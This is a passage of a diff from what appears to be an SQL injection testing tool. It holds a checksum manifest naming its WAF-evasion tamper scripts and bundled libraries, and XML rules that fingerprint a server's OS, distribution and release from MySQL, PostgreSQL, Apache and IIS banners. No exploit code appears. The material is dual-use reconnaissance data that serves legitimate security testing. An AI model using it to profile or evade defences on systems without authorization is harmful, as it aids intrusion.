+fa25e5a74c6cf0787b4f72321294095a3b7690f53423f058187ad08b458ef1fe  tamper/charencode.py
+1c87fc49792df6091b7eb880108142b42a0a3810cc0cd2316a858ccdbf1c5ce4  tamper/charunicodeencode.py
+00d51073f9e40d8dfa5fcb04eafda359bd0ecb91e358b3910f3ec43c1a381111  tamper/charunicodeescape.py
+549d206488c3c651eca958bb1b016771fc36e6ebbed76c009959a728a66ed333  tamper/commalesslimit.py
+f6351d88d74c7ec4f39f306c86ea8bddf41a04bc6c25987bea92df877542ec6f  tamper/commalessmid.py
+52dbbe4353f1096747787c83d5b6c60a41861f59c03ee28cca2b52c107266b85  tamper/commentbeforeparentheses.py
+60b5bcdcdee261e39b7479811c09b936c52b22da6c1397a5c0c220ce241122f9  tamper/concat2concatws.py
+14799daf71f4885883b294d8f697c9b1e33d24f9e9f1d3be6d2a2c60b82f69a7  tamper/decentities.py
+b5cf413cc21b0bf0059d8af98a33b2cf19f49b5c21e0e3846783ca7e5d1eff9a  tamper/dunion.py
+27504dc545c498708271d0c7bea14b44b89403c5b8fc98d60120dd9ea52b6d0f  tamper/equaltolike.py
+20335ef616befb53184fb0179c492f0d167b58ae718fa015f72c837244a00a4c  tamper/equaltorlike.py
+5a4927d47403b951d943d3c08af144396012659598d3d2ac5fbf84572c38fe4e  tamper/escapequotes.py
+dad8dddf7b63d4fadfa9e87fc7676888f058907ba45ace449f5cde87dc5643d0  tamper/greatest.py
+77a0e7a233124632f4906597a0a19a00739f8c027eb0a433451dc09fa1bda056  tamper/halfversionedmorekeywords.py
+97e208dde78b6c27bf57a761433280d5b9e4e7934f9524fe228326c658bb150f  tamper/hex2char.py
+9eaae1c351058602c9f19306ff6498b60af166fd7242089ceb7be8f3782568e0  tamper/hexentities.py
+6dc224f2af8f57e9b48d860fea662c4efdf77cb152de9b6db5469c7ab3f10afb  tamper/htmlencode.py
+cb1b78a6984b99b86f8ae3d88b2da871e6c4d478a11540a2864786705e304429  tamper/if2case.py
+7b95283abcef696bf22b19690ce9381bbd3e8d6f78846a541759546c19805c90  tamper/ifnull2casewhenisnull.py
+d3e85b2eeb8330482fd602cff23399a23bb6a2d25ea44a594e5a8ca0028e78a3  tamper/ifnull2ifisnull.py
+d498e409c96d2ae2cc86263ead52ae385e95e9ec27f28247180c7c73ec348b3f  tamper/informationschemacomment.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  tamper/__init__.py
+b9a84211c84785361f4efa55858a1cdddd63cee644d0b8d4323b3a5e3db7d12f  tamper/least.py
+0de2bd766f883ac742f194f991c5d38799ffbf4346f4376be7ec8d750f2d9ef8  tamper/lowercase.py
+c390d072ed48431ab5848d51b9ca5c4ff323964a770f0597bdde943ed12377f8  tamper/luanginx.py
+7eba10540514a5bfaee02e92b711e0f89ffe30b1672ec25c7680f2aa336c8a58  tamper/misunion.py
+b262da8d38dbb4be64d42e0ab07e25611da11c5d07aa11b09497b344a4c76b8d  tamper/modsecurityversioned.py
+fbb4ea2c764a1402293b71064183a6e929d5278afa09c7799747c53c3d3a9df3  tamper/modsecurityzeroversioned.py
+91c7f96f3d0a3da9858e6ebebb337d6e3773961ff8e85af8b9e8458f782e75c0  tamper/multiplespaces.py
+e0d800cfefa04fefed744956d4f3c17ccaeb1b59cb7a19c2796da4b1ebff6a3f  tamper/ord2ascii.py
+50ebd172e152ed9154ff75acc45b95b3c406be2d2985fe1190bfb2f6a4077763  tamper/overlongutf8more.py
+a1e7d8907e7b4b25b1a418e8d5221e909096f719dcb611d15b5e91c83454ccdc  tamper/overlongutf8.py
+639b9cc83d94f536998b4efed8a88bed6ff8e9c67ea8381e87d1454cdea80293  tamper/percentage.py
+704551003e62d4fc1949855931d6cebd57cc5cdbf2221dbd43e51cbdad6f130d  tamper/plus2concat.py
+b9d1e3ee657236b13ad5ecaf2adfa089e24a0e67738253eedb533a68f277a6e3  tamper/plus2fnconcat.py
+fb4b7539284db076147a530df1dd072d5d35e32a71fd7bc8e312319d5f3aaa52  tamper/randomcase.py
+b27066b7ea4f69243d5a353327090a0630bbf7f512edf5e277cde2c10139b3dd  tamper/randomcomments.py
+35a8539ac8030d3fc176ea8231fe8983285fc576f7e0b50ccdf911a565f1f758  tamper/schemasplit.py
+a34524af6fe2f2bba642b3234fbf1aa8785761e7d82906005b5476b7cc724857  tamper/scientific.py
+65d22c54abfa61b73140020d48a86ec8eeb4c9e4e5e088d1462e4bce4a64f18b  tamper/sleep2getlock.py
+c10f1a4c0fa268d252736cdf4b3bb258ee5d12263feb102149e481b2a26efb12  tamper/space2comment.py
+928cee298ca2b6d055fc6b7e7fc7bcf3313581bf0dd9f5b319c16d5914a991ee  tamper/space2dash.py
+63e1b03a8768668a52a2a166eb07c27613253b5e3143cc0ce6afe4f844822a3f  tamper/space2hash.py
+6485e6c76e82be84801c1ff8a1a0bdc3654c434c1f6a95c45fb53efe94fc6c02  tamper/space2morecomment.py
+757f554f9541aee3ae09b40dcb26d258584877b4d01bad4ee485afc67b1ae12a  tamper/space2morehash.py
+9584b0341fb6528fdbe3fe14e34b0c4dcd3d589bd5c2f8a68715ba5b20dbf286  tamper/space2mssqlblank.py
+4da39437e518e02c85b4de57447cb845356167909a256a476e63ec3faebbf26d  tamper/space2mssqlhash.py
+e49d8501e09806ab2b8019c6e0864003cb538f43d1de5a09415d915c827db7b7  tamper/space2mysqlblank.py
+015284f173c8ba54f347a3ce5d6205092ba8aed811a45077aa69ce6ce52b1ad9  tamper/space2mysqldash.py
+92797c4dd9a2e41c9738f9fa51575958dbd178053a1166a890ace6e719f50fe7  tamper/space2plus.py
+e025cdcc48a1915352b0e112f2f5511beccb3f278860b35c4d07038c509fd0a5  tamper/space2randomblank.py
+85ba64cf231a4fa36e1550f6575fe10fd8aa6cf084f92a5e8cea60378e96cabf  tamper/sp_password.py
+30c211a5c33209dd36f44f3d7a9bb1c8002ba1b1d18e74f0ba606c9838b1be09  tamper/substring2leftright.py
+0a8c5dfbcc2dd28544edbd0a40286407fb724edbaa5dcad6c646c465bccf103d  tamper/symboliclogical.py
+a941abd9d03a66ad796252bbc7c70bdafa5a0203ce66865bec48dc77a3cb8724  tamper/unionalltounion.py
+beddd06210ecc68cc096d42c33fc502d7bb9c040c84952340a8eb1a42b592968  tamper/unmagicquotes.py
+b2c220604ebf4f71e563f6b6b564fdb85b045af8fce681411a931e49556b569e  tamper/uppercase.py
+47a5fe04e53d7c126d6b56139a1e6053c41c7e3a0d9e2b9dbc4b93573099a10a  tamper/varnish.py
+2c9ad34f8a8a78ed2f10bf39985197fdfd7df12ebc364a5b32276170bc5f6f05  tamper/versionedkeywords.py
+6780c120d8099283cb26120f8d42e1ced63d89401a31e8163cc7954634706043  tamper/versionedmorekeywords.py
+672e949a0d63a01a6b13a6211fa9b9a9bc365f9f2688acd2ece4c20dfc031025  tamper/xforwardedfor.py
+55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a  thirdparty/ansistrm/ansistrm.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/ansistrm/__init__.py
+dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2  thirdparty/beautifulsoup/beautifulsoup.py
+7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63  thirdparty/beautifulsoup/__init__.py
+0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a  thirdparty/bottle/bottle.py
+9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2  thirdparty/bottle/__init__.py
+0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff  thirdparty/chardet/big5freq.py
+901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773  thirdparty/chardet/big5prober.py
+df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f  thirdparty/chardet/chardistribution.py
+e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee  thirdparty/chardet/charsetgroupprober.py
+2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8  thirdparty/chardet/charsetprober.py
+558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f  thirdparty/chardet/codingstatemachine.py
+3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c  thirdparty/chardet/compat.py
+4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c  thirdparty/chardet/cp949prober.py
+0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5  thirdparty/chardet/enums.py
+924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927  thirdparty/chardet/escprober.py
+46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce  thirdparty/chardet/escsm.py
+883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c  thirdparty/chardet/eucjpprober.py
+fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa  thirdparty/chardet/euckrfreq.py
+32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16  thirdparty/chardet/euckrprober.py
+368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0  thirdparty/chardet/euctwfreq.py
+d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797  thirdparty/chardet/euctwprober.py
+257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57  thirdparty/chardet/gb2312freq.py
+806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c  thirdparty/chardet/gb2312prober.py
+737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a  thirdparty/chardet/hebrewprober.py
+62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6  thirdparty/chardet/__init__.py
+be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8  thirdparty/chardet/jisfreq.py
+3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a  thirdparty/chardet/jpcntx.py
+d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1  thirdparty/chardet/langbulgarianmodel.py
+2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7  thirdparty/chardet/langcyrillicmodel.py
+f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800  thirdparty/chardet/langgreekmodel.py
+2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070  thirdparty/chardet/langhebrewmodel.py
+4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0  thirdparty/chardet/langhungarianmodel.py
+f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94  thirdparty/chardet/langthaimodel.py
+5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459  thirdparty/chardet/langturkishmodel.py
+4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f  thirdparty/chardet/latin1prober.py
+011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4  thirdparty/chardet/mbcharsetprober.py
+87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e  thirdparty/chardet/mbcsgroupprober.py
+498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92  thirdparty/chardet/mbcssm.py
+2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be  thirdparty/chardet/sbcharsetprober.py
+d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970  thirdparty/chardet/sbcsgroupprober.py
+208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4  thirdparty/chardet/sjisprober.py
+a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6  thirdparty/chardet/universaldetector.py
+21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c  thirdparty/chardet/utf8prober.py
+b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8  thirdparty/chardet/version.py
+1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd  thirdparty/clientform/clientform.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/clientform/__init__.py
+162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced  thirdparty/colorama/ansi.py
+a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3  thirdparty/colorama/ansitowin32.py
+d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659  thirdparty/colorama/initialise.py
+f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5  thirdparty/colorama/__init__.py
+fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874  thirdparty/colorama/win32.py
+179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea  thirdparty/colorama/winterm.py
+4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3  thirdparty/fcrypt/fcrypt.py
+6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f  thirdparty/fcrypt/__init__.py
+dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9  thirdparty/identywaf/data.json
+5aa308d6173ad9e2a5006a719fdbfe8c20d7e14b6d70c04045b935e44caa96d0  thirdparty/identywaf/identYwaf.py
+edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa  thirdparty/identywaf/__init__.py
+d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347  thirdparty/identywaf/LICENSE
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/__init__.py
+879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8  thirdparty/keepalive/__init__.py
+f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8  thirdparty/keepalive/keepalive.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/magic/__init__.py
+4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8  thirdparty/magic/magic.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/multipart/__init__.py
+fa2c4cfc6f1fb29a3cf4ad119243a10aef2dfe9cf93129436aa649baef8e4764  thirdparty/multipart/multipartpost.py
+ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696  thirdparty/odict/__init__.py
+9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb  thirdparty/odict/ordereddict.py
+691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8  thirdparty/prettyprint/__init__.py
+8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f  thirdparty/prettyprint/prettyprint.py
+3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84  thirdparty/pydes/__init__.py
+d1d54fc08f80148a4e2ac5eee84c8475617e8c18bfbde0dfe6894c0f868e4659  thirdparty/pydes/pyDes.py
+1c61d71502a80f642ff34726aa287ac40c1edd8f9239ce2e094f6fded00d00d4  thirdparty/six/__init__.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/socks/__init__.py
+7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9  thirdparty/socks/LICENSE
+543217f63a4f0a7e7b4f9063058d2173099d54d010a6a4432e15a97f76456520  thirdparty/socks/socks.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/termcolor/__init__.py
+b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df  thirdparty/termcolor/termcolor.py
+4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc  thirdparty/wininetpton/__init__.py
+7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502  thirdparty/wininetpton/win_inet_pton.py

data/xml/banner/generic.xml

@@ -27,49 +27,53 @@
         <info sp="4"/>
     </regexp>
 
-    <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
+    <regexp value="Service Pack 5">
-
+        <info sp="5"/>
-    <regexp value="Windows.*10\.0">
-        <info type="Windows" distrib="2016|10"/>
     </regexp>
 
-    <regexp value="Windows.*6\.3">
+    <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
+
+    <regexp value="Windows.*\b10\.0">
+        <info type="Windows" distrib="2016|2019|2022|10|11"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.3">
         <info type="Windows" distrib="2012 R2|8.1"/>
     </regexp>
 
-    <regexp value="Windows.*6\.2">
+    <regexp value="Windows.*\b6\.2">
         <info type="Windows" distrib="2012|8"/>
     </regexp>
 
-    <regexp value="Windows.*6\.1">
+    <regexp value="Windows.*\b6\.1">
         <info type="Windows" distrib="2008 R2|7"/>
     </regexp>
 
-    <regexp value="Windows.*6\.0">
+    <regexp value="Windows.*\b6\.0">
         <info type="Windows" distrib="2008|Vista"/>
     </regexp>
 
-    <regexp value="Windows.*5\.2">
+    <regexp value="Windows.*\b5\.2">
         <info type="Windows" distrib="2003"/>
     </regexp>
 
-    <regexp value="Windows.*5\.1">
+    <regexp value="Windows.*\b5\.1">
         <info type="Windows" distrib="XP"/>
     </regexp>
 
-    <regexp value="Windows.*5\.0">
+    <regexp value="Windows.*\b5\.0">
         <info type="Windows" distrib="2000"/>
     </regexp>
 
-    <regexp value="Windows.*4\.0">
+    <regexp value="Windows.*\b4\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
-    <regexp value="Windows.*3\.0">
+    <regexp value="Windows.*\b3\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
-    <regexp value="Windows.*2\.0">
+    <regexp value="Windows.*\b2\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
@@ -79,6 +83,10 @@
         <info type="Linux"/>
     </regexp>
 
+    <regexp value="\bArch\b">
+        <info type="Linux" distrib="Arch"/>
+    </regexp>
+
     <regexp value="CentOS">
         <info type="Linux" distrib="CentOS"/>
     </regexp>
@@ -111,11 +119,23 @@
         <info type="Linux" distrib="Mandrake"/>
     </regexp>
 
+    <regexp value="Manjaro">
+        <info type="Linux" distrib="Manjaro"/>
+    </regexp>
+
     <regexp value="Mandriva">
         <info type="Linux" distrib="Mandriva"/>
     </regexp>
 
-    <regexp value="Red[\-\_\ ]*Hat">
+    <regexp value="\bMint\b">
+        <info type="Linux" distrib="Mint"/>
+    </regexp>
+
+    <regexp value="\bPuppy\b">
+        <info type="Linux" distrib="Puppy"/>
+    </regexp>
+
+    <regexp value="Red[\-\_\ ]?Hat">
         <info type="Linux" distrib="Red Hat"/>
     </regexp>
 
@@ -131,7 +151,7 @@
         <info type="Linux" distrib="Ubuntu"/>
     </regexp>
 
-    <!-- Unices -->
+    <!-- BSD -->
 
     <regexp value="FreeBSD">
         <info type="FreeBSD"/>
@@ -147,7 +167,7 @@
 
     <!-- Mac OSX -->
 
-    <regexp value="Mac[\-\_\ ]*OSX">
+    <regexp value="Mac[\-\_\ ]?OSX">
         <info type="Mac OSX"/>
     </regexp>
 

data/xml/banner/mysql.xml

@@ -0,0 +1,79 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * https://en.wikipedia.org/wiki/Debian_version_history
+-->
+
+<root>
+    <regexp value="^([\d\.\-]+)[\-\_\ ].*">
+        <info dbms_version="1"/>
+    </regexp>
+
+    <!-- Windows -->
+    <regexp value="^([\d\.\-]+)[\-\_\ ].*nt$">
+        <info dbms_version="1" type="Windows"/>
+    </regexp>
+
+    <!-- Debian -->
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+potato">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="2.1" codename="potato"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+woody">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="3.0" codename="woody"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+sarge">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+etch">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="4.0" codename="etch"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+lenny">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+squeeze">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+wheezy">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="7" codename="wheezy"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+jessie">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="8" codename="jessie"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+stretch">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="9" codename="stretch"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+buster">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="10" codename="buster"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bullseye">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="11" codename="bullseye"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bookworm">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="12" codename="bookworm"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+trixie">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="13" codename="trixie"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
+        <info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+testing">
+        <info dbms_version="1" type="Linux" distrib="Debian" codename="testing"/>
+    </regexp>
+
+</root>

data/xml/banner/postgresql.xml

@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <regexp value="PostgreSQL\s+([\w\.]+)">
+        <info dbms_version="1"/>
+    </regexp>
+
+    <!-- Windows -->
+    <regexp value="Visual C\+\+">
+        <info type="Windows"/>
+    </regexp>
+
+    <regexp value="mingw([\d]+)">
+        <info type="Windows"/>
+    </regexp>
+</root>

data/xml/banner/server.xml

@@ -3,14 +3,14 @@
 <!--
      References:
      * https://en.wikipedia.org/wiki/Internet_Information_Services
-     * http://distrowatch.com
+     * https://distrowatch.com
 -->
 
 <root>
     <!-- Microsoft IIS -->
 
     <regexp value="Microsoft-IIS/(10\.0)">
-        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|10"/>
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|2019|2022|10|11"/>
     </regexp>
 
     <regexp value="Microsoft-IIS/(8\.5)">
@@ -74,19 +74,31 @@
     <!-- Apache: CentOS -->
 
     <regexp value="Apache/2\.0\.46 \(CentOS\)">
-        <info type="Linux" distrib="CentOS" release="3.9"/>
+        <info type="Linux" distrib="CentOS" release="3"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.52 \(CentOS\)">
-        <info type="Linux" distrib="CentOS" release="4.9"/>
+        <info type="Linux" distrib="CentOS" release="4"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.3 \(CentOS\)">
-        <info type="Linux" distrib="CentOS" release="5.10"/>
+        <info type="Linux" distrib="CentOS" release="5"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.15 \(CentOS\)">
-        <info type="Linux" distrib="CentOS" release="6.8"/>
+        <info type="Linux" distrib="CentOS" release="6"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="7"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.37 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="8"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.48 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="9"/>
     </regexp>
 
     <!-- Apache: Debian -->
@@ -127,36 +139,36 @@
         <info type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
     </regexp>
 
-    <regexp value="Apache/1\.3\.34 \(Debian GNU\/Linux\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
-    </regexp>
-
     <regexp value="Apache/2\.2\.3 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
+        <info type="Linux" distrib="Debian" release="4" codename="etch"/>
-    </regexp>
-
-    <regexp value="Apache/2\.2\.6 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch" updated="True"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.9 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+        <info type="Linux" distrib="Debian" release="5" codename="lenny"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.16 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
+        <info type="Linux" distrib="Debian" release="6" codename="squeeze"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.22 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="7.0" codename="wheezy"/>
+        <info type="Linux" distrib="Debian" release="7" codename="wheezy"/>
     </regexp>
 
     <regexp value="Apache/2\.4\.10 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="8.0" codename="jessie"/>
+        <info type="Linux" distrib="Debian" release="8" codename="jessie"/>
     </regexp>
 
-    <regexp value="Apache/2\.4\.18 \(Debian\)">
+    <regexp value="Apache/2\.4\.25 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="9.0" codename="jessie (testing)"/>
+        <info type="Linux" distrib="Debian" release="9" codename="stretch"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.38 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="10" codename="buster"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.48 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="11" codename="bullseye"/>
     </regexp>
 
     <!-- Apache: Fedora -->
@@ -273,6 +285,51 @@
         <info type="Linux" distrib="Fedora" release="23"/>
     </regexp>
 
+    <regexp value="Apache/2\.4\.18 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="24"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="25"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="26"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.28 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="27"/>
+    </regexp>
+
+
+    <regexp value="Apache/2\.4\.33 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="28"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.34 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="29"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.39 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="30"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.41 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="31"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.43 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="32"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="33|34"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.51 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="35"/>
+    </regexp>
+
     <!-- Apache: FreeBSD -->
 
     <regexp value="Apache/2\.0\.16 \(FreeBSD\)">
@@ -379,6 +436,26 @@
         <info type="FreeBSD" release="10.3"/>
     </regexp>
 
+    <regexp value="Apache/2\.4\.27 \(FreeBSD\)">
+        <info type="FreeBSD" release="10.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.26 \(FreeBSD\)">
+        <info type="FreeBSD" release="11.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.39 \(FreeBSD\)">
+        <info type="FreeBSD" release="11.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.51 \(FreeBSD\)">
+        <info type="FreeBSD" release="12.3"/>
